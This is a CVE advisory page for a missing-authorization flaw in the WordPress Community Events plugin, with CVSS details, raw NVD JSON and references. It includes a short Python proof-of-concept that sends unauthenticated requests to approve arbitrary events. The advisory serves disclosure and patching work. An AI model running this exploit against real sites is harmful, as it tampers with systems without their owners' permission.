Security Vulnerability Report
CVE-2025-14029 CVSS 5.3 MEDIUM

CVE-2025-14029

Published: 2026-01-17 05:16:10
Last Modified: 2026-04-15 00:35:42

Description

The Community Events plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_admin_event_approval() function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to approve arbitrary events via the 'eventlist' parameter.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Community Events plugin <= 1.5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-14029 PoC - WordPress Community Events Unauthenticated Event Approval
target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php"

# Payload to approve arbitrary events without authentication
payload = {
    "action": "admin_event_approval",
    "eventlist": "1,2,3,999",  # Specify event IDs to approve
}

# Send the exploit request
response = requests.post(target_url, data=payload)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# Check if the request was successful
if response.status_code == 200:
    print("[+] Exploit sent successfully - events may have been approved")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14029", "sourceIdentifier": "[email protected]", "published": "2026-01-17T05:16:10.370", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Community Events plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_admin_event_approval() function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to approve arbitrary events via the 'eventlist' parameter."}, {"lang": "es", "value": "El plugin Community Events para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de capacidad faltante en la función ajax_admin_event_approval() en todas las versiones hasta la 1.5.6, inclusive. Esto hace posible que atacantes no autenticados aprueben eventos arbitrarios a través del parámetro 'eventlist'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.5/community-events.php#L160", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.5/community-events.php#L64", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/community-events/trunk/community-events.php#L160", "source": "[email protected]"}, 
{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3437116%40community-events&new=3437116%40community-events&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/098c3f4c-b6bc-462a-98ef-30e6a68d74cf?source=cve", "source": "[email protected]"}]}}